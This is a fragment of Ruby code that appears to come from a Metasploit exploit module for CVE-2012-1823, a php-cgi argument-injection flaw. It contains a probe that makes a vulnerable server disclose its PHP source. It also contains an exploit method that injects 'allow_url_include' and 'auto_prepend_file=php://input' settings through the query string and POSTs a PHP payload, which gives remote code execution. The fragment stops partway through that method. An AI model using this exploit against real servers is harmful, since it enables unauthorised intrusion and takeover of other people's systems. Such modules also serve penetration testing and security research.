register_options([
OptString.new('TARGETURI', [false, "The URI to request"]),
], self.class)
end
# php-cgi -h
# ...
# -s Display colour syntax highlighted source.
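# Probe for CVE-2012-1823 (php-cgi query-string argument injection).
#
# php-cgi treats a query string that contains no '=' as command-line
# arguments, so "?-s" makes a vulnerable target return its own script as
# syntax-highlighted HTML (see the php-cgi -h excerpt above). To avoid a
# false positive we first fetch the bare URI: if that response already looks
# like highlighted source we cannot tell the two cases apart.
#
# NOTE(security): this is an active check, not a passive one. On a vulnerable
# host the "-s" request discloses the target script's PHP source to the
# tester (and leaves that request in the server log).
#
# @return [Exploit::CheckCode] Vulnerable, Safe, or Unknown. Unknown is
#   returned when TARGETURI is empty, when the baseline is ambiguous, or when
#   the "-s" probe gets no response at all (a timeout or dropped request is
#   not evidence of safety).
def check
  uri = target_uri.path
  return Exploit::CheckCode::Unknown if uri.nil? || uri.empty?

  # Strip any query string the user put in TARGETURI; the probe supplies its
  # own, and a stray '=' would stop php-cgi from seeing "-s" as an argument.
  # Non-destructive sub: do not mutate the string owned by target_uri.
  uri = uri.sub(/\?.*/, '')
  print_status("Checking uri #{uri}")

  baseline = send_request_raw({ 'uri' => uri })
  if php_highlighted_source?(baseline)
    print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
    return Exploit::CheckCode::Unknown
  end

  probe = send_request_raw({ 'uri' => uri + '?-s' })
  if probe.nil?
    print_error("No response to the -s probe, could not determine whether it was vulnerable")
    return Exploit::CheckCode::Unknown
  end
  return Exploit::CheckCode::Vulnerable if php_highlighted_source?(probe)

  print_status("Server responded indicating it was not vulnerable")
  Exploit::CheckCode::Safe
end

# True when +response+ is an HTTP 200 whose body looks like php -s output.
# highlight_string() wraps the source in <code><span style="..."> and
# HTML-escapes the opening tag, so the body contains "&lt;?", never a raw
# "<;?" -- the literal the previous pattern looked for could not appear and
# the check would never report Vulnerable.
#
# @param response [Rex::Proto::Http::Response, nil]
# @return [Boolean]
def php_highlighted_source?(response)
  return false unless response && response.code == 200
  !!(response.body =~ /<code><span style.*&lt;\?/mi)
end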
def exploit
#sleep 100
begin
php_trues = [ "1", "on", "true" ]
php_falses = [ "0", "off", "false" ]
args = [
"-d+allow_url_include%3d#{rand_php_ini_true}",
"-d+auto_prepend_file%3dphp://input",
]
qs = args.join("+")
uri = "#{target_uri}?#{qs}"
p uri
# Has to be all on one line, so gsub out the comments and the newlines
payload_oneline = "<?php " +payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
response = send_request_cgi( {
'method' => "POST",
'global' => true,
'uri' => uri,
'data' => payload_oneline,
}, 0.1)
handler